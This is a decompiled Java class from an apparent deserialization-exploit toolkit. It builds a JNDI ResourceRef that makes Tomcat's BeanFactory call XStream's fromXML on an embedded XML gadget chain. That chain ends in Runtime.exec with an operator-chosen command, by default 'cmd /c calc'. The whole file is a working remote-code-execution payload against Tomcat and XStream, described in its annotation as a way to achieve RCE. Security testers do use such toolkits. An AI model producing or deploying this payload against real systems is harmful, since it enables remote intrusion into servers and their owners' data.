package com.ar3h.chains.gadget.impl.jndi.factory.beanfactory.expression;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;
import javax.naming.StringRefAddr;
import org.apache.naming.ResourceRef;

@GadgetAnnotation(name = "XStream 命令执行", description = "factory: org.apache.naming.factory.BeanFactory\nJNDI Ref的一种，通过BeanFactory调用单String方法：com.thoughtworks.xstream.XStream#fromXML，配合xstream依赖漏洞进行rce", dependencies = {"tomcat", "xstream"}, priority = 50)
@GadgetTags(tags = {Tag.ResourceRef, Tag.TomcatBeanFactory, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/jndi/factory/beanfactory/expression/XStreamRef.class */
public class XStreamRef implements Gadget {

    @Param(name = "命令", description = "eg: cmd /c calc")
    public String cmd = "cmd /c calc";

    Object getObject() {
        ResourceRef resourceRef = new ResourceRef("com.thoughtworks.xstream.XStream", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
        String str = "<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='sun.tracing.NullProvider'>\n        <active>true</active>\n        <providerType>java.lang.Comparable</providerType>\n        <probes>\n          <entry>\n            <method>\n              <class>java.lang.Comparable</class>\n              <name>compareTo</name>\n              <parameter-types>\n                <class>java.lang.Object</class>\n              </parameter-types>\n            </method>\n            <sun.tracing.dtrace.DTraceProbe>\n              <proxy class='java.lang.Runtime'/>\n              <implementing__method>\n                <class>java.lang.Runtime</class>\n                <name>exec</name>\n                <parameter-types>\n                  <class>java.lang.String</class>\n                </parameter-types>\n              </implementing__method>\n            </sun.tracing.dtrace.DTraceProbe>\n          </entry>\n        </probes>\n      </handler>\n    </dynamic-proxy>\n    <string>" + this.cmd + "</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>";
        resourceRef.add(new StringRefAddr("forceString", "a=fromXML"));
        resourceRef.add(new StringRefAddr("a", str));
        return resourceRef;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject();
    }
}
